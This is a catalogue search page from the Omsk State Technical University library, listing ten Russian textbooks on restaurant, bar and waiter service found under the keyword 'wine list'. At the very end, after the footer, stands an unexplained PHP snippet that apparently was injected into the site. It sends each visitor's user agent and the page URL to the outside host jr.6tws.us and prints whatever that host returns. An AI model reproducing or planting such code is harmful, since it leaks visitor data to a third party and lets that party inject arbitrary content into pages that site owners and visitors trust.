Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

214 пользователей


Зарегистрированных: 6 

Филиппова Галина Ивановна

Борисенко Виктория Александровна

Гиске Нина Александровна

Борисенко Елена Стефановна

Зюзькова Ольга Николаевна

Гиске Нина Александровна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КАРТА ВИН")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Кучер Л. С. Технология приготовления коктейлей и напитков [Текст] : учеб. пособие для образоват. учреждений начального проф. образования / Л. С. Кучер, Л. М. Шкуратова, 2005. - 347 с.
Держатели документа (Информация об экземплярах) 
2. 
Радченко Л. А. Организация производства и обслуживания на предприятиях общественного питания [Текст] / Л. А. Радченко, 2013. - 321 с.
Ключевые слова 
МЕНЮ -- ДОКУМЕНТАЦИЯ -- ОРГАНИЗАЦИЯ ТРУДА рациональная -- Нормирование труда -- РАБОЧЕЕ МЕСТО -- Цех овощной -- Цех мясной -- Цех рыбный -- Цех мясо-рыбный -- Цех доработки полуфабрикатов -- Цех обработки зелени -- Цех горячий -- Цех холодный -- Цех кондитерский -- Моечная кухонной посуды -- Бракераж -- Хлеборезка -- Срок хранения продуктов -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- КАРТА ВИН -- РЕСТОРАН - ОБСУЖИВАНИЕ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- СТОЛ ШВЕДСКИЙ -- ПИТАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ СОЦИАЛЬНОЕ -- ПИТАНИЕ СТУДЕНТОВ -- ПИТАНИЕ УЧАЩИХСЯ -- ПИТАНИЕ РАБОЧИХ
Держатели документа (Информация об экземплярах) 
3. 
Ермакова В. И. Официант, бармен [Текст] / В. И. Ермакова, 2012. - 271 с.
Ключевые слова 
ОФИЦИАНТ - БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- УСЛУГИ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПРОЦЕСС ТЕХНОЛОГИЧЕСКИЙ -- ПОМЕЩЕНИЕ ПРОИЗВОДСТВЕННОЕ -- ПОМЕЩЕНИЕ СКЛАДСКОЕ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- ПОМЕЩЕНИЕ ДЛЯ НАРЕЗАНИЯ ХЛЕБА -- ОРГАНИЗАЦИЯ РАЗДАТОЧНОЙ РАБОТЫ -- СЕРВИС - БАР -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- ОБОРУДОВАНИЕ ОБЕДЕННОГО ЗАЛА -- ЗАЛ ОБЕДЕННЫЙ -- ОБОРУДОВАНИЕ БАНКЕТНОГО ЗАЛА -- ЗАЛ БАНКЕТНЫЙ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА КЕРАМИЧЕСКАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА МЕТАЛЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- МЕНЮ -- КАРТА ВИН -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ЗАКАЗ БЛЮД -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ КОМБИНИРОВАННЫЙ -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - ГОСТИНИЦА -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - КОНФЕРЕНЦИЯ -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - СВАДЬБА -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - НОВЫЙ ГОД -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ НА ДОМУ -- БАР -- ПОСУДА БАРНАЯ -- ИНВЕНТАРЬ БАРА -- БАРМЕН -- БАР - МУЗЫКА -- РАЗЛИВ НАПИТКОВ -- ПРАВИЛА ПОДАЧИ НАПИТКОВ -- ПРАВИЛА ПОДАЧИ ТАБАЧНЫХ ИЗДЕЛИЙ -- КОКТЕЙЛЬ -- ТЕХНОЛОГИЯ ПРИГОТОВЛЕНИЯ КОКТЕЙЛЕЙ -- НАПИТКИ -- ОФИЦИАНТ -- БАРМЕН -- ХАРАКТЕРИСТИКА КВАЛИФИКАЦИОННАЯ -- ОХРАНА ТРУДА
Держатели документа (Информация об экземплярах) 
4. 
Главчева С. И. Организация производства и обслуживание в ресторанах и барах [Текст] / С. И. Главчева, Л. Е. Чередниченко, 2012. - 205 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- БИЗНЕС РЕСТОРАННЫЙ -- РЕСТОРАЦИЯ РУССКАЯ -- РЕСТОРАЦИЯ ЗАРУБЕЖНАЯ -- РЕСТОРАН - ИСТОРИЯ -- РЕСТОРАН -- БАР -- ПОСУДА СТОЛОВАЯ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА ФАЯНСОВАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА МЕТАЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ДОГОТОВКИ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ОРГАНИЗАЦИЯ ТРУДА -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ЗАМЕНА ПОСУДЫ -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- КАРТА СИГАРНАЯ -- КАРТА КАЛЬЯННАЯ -- КАЛЬЯН -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- КОФЕ - BREAK -- БАНКЕТ - ЧАЙ -- ФОНДЮ -- СТОЛ ШВЕДСКИЙ -- ОБСЛУЖИВАНИЕ ПРАЗДНИЧНЫХ ВЕЧЕРОВ -- КЕЙТЕРИНГ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- ПЕРСОНАЛ РЕСТОРАНА -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- БАРМЕН

В учебном пособии описана организация обслуживания потребителей в ресторанах и барах с учетом современных требований рынка, отечественного и зарубежного опыта, рассмотрены особенности проведения различных мероприятий и банкетов. Представлена организация проведения новых видов обслуживания по типу «сырной тележки», кейтеринга, предложены примеры написания винной, сигаретной, коньячной и кальянной карт. Приведены описания состава и организации работы производственных помещений и помещений для потребителей, их оснащения современным оборудованием, мебелью, а также характеристика различных видов ресторанной и барной посуды и белья.

Пособие предназначено для студентов вузов, а также работников предприятий общественного питания.

5. 
Ахрапоткова Н. Б. Справочник официанта, бармена [Текст] : учеб. пособие для образоват. учреждений начального проф. образования / Н. Б. Ахрапоткова, 2005. - 270 с.
Ключевые слова 
ОФИЦИАНТ -- БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- ОБОРУДОВАНИЕ БАРА -- ПОСУДА СТОЛОВАЯ -- ПОСУДА фарфоровая -- ПОСУДА фаянсовая -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА металическая -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ИНВЕНТАРЬ для бара -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- МЕТРДОТЕЛЬ -- СОМЕЛЬЕ -- ПРАВИЛА САНИТАРНЫЕ В ОБЩЕПИТ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- МЕНЮ -- КАРТА ВИН -- КАРТА коктейлей -- ВИНО ВИНОГРАДНОЕ -- ВИНО красное -- ВИНО белое -- ВИНО розовое -- ВИНО французское -- ВИНО итальянское -- ВИНО испанское -- ВИНО Германии -- ВИНО Португалии -- ВИНО Австралии -- ВИНО Новой Зеландии -- ВИНО Южной Африки -- ХЕРЕС -- ПОРТВЕЙН -- ВЕРМУТ -- МАДЕРА -- МАРСАЛА -- ВИНО ликерное -- ВИНО игристое -- ШАМПАНСКОЕ -- ВОДКА -- ВИСКИ -- КОНЬЯК -- БРЕНДИ -- ДЖИН -- РОМ -- ТЕКИЛА -- ЛИКЕР -- НАСТОЙКА -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ПИВО -- ЧАЙ -- КОФЕ -- ОБСЛУЖИВАНИЕ в зале ресторане -- ПОСЕТИТЕЛь ресторана -- РЕЗЕРВИРОВАНИЕ столиков -- НАПИТОК СМЕШАННЫЙ -- КОКТЕЙЛЬ -- ОБСЛУЖИВАНИЕ в баре -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- БАНКЕТ "буфет-коктейль" -- ОБСЛУЖИВАНИЕ туристов -- ТУР -- ПИТАНИЕ туристов -- СТОЛ ШВЕДСКИЙ -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЫНОК ресторанных услуг -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- ПОМОЩЬ ПЕРВАЯ МЕДИЦИНСКАЯ -- СЛОВАРЬ барных терминов -- СЛОВАРЬ дегустаторских терминов
Держатели документа (Информация об экземплярах) 
6. 
Иванникова Е. И. Барное дело [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2004. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- БАР - МАРКЕТИНГ -- бар - реклама -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- боули -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
7. 
Ресторанный бизнес в России: технология успеха [Текст] / Л. С. Кучер, Л. М. Шкуратова, С. Л. Ефимов, Т. Н. Голубева, 2002. - 465 с.
Ключевые слова 
РЕСТОРАН -- БИЗНЕС ресторанный -- БАР -- РЕСТОРАН - Маркетинг -- МЕРЧАНДАЙЗИНГ -- РЕСТОРАН - РЕКЛАМА -- МЕНЮ РЕСТОРАНА -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ПРИБОР СТОЛОВЫЙ -- КАРТА ВИН -- ОФИЦИАНТ -- ОБСЛУЖИВАНИЕ банкетное -- БАНКЕТ -- СЕРВИРОВКА стола -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ комбинированный -- Кейтеринг -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ национальная -- УПРАВЛЕНИЕ рестораном -- ЭТИКА официанта -- РЕСТОРАН - Планирование -- РЕСТОРАН - Налоги
Оглавление 
  • Правила оказания услуг общественнного питания. - с.459-465
Держатели документа (Информация об экземплярах) 
8. 
Ресторанный сервис. Основы международной практики обслуживания для профессионалов и начинающих [Текст] : справочное издание / С. Зигель и др., 2003. - 287 с.
Ключевые слова 
ОФИЦИАНТ -- ПРИЕМ ГОСТЕЙ -- РЕСТОРАН - ПЕРСОНАЛ -- СОМЕЛЬЕ -- ПОСУДА СТОЛОВАЯ -- ДИЗАЙН ресторана -- СЕРВИРОВКА СТОЛА -- Завтрак - ресторан -- Ленч - ресторан -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- БАР -- БУФЕТ -- БАНКЕТ -- КОКТЕЙЛЬ - парти -- Кухня датская -- КУХНЯ австрийская -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- Кухня швейцарская -- Кухня шведская
9. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
10. 
Иванникова Е. И. Барное дело [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2002. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- Напиток смешанный -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3183 - 26.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.68 с.12 запросов, 0.47c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;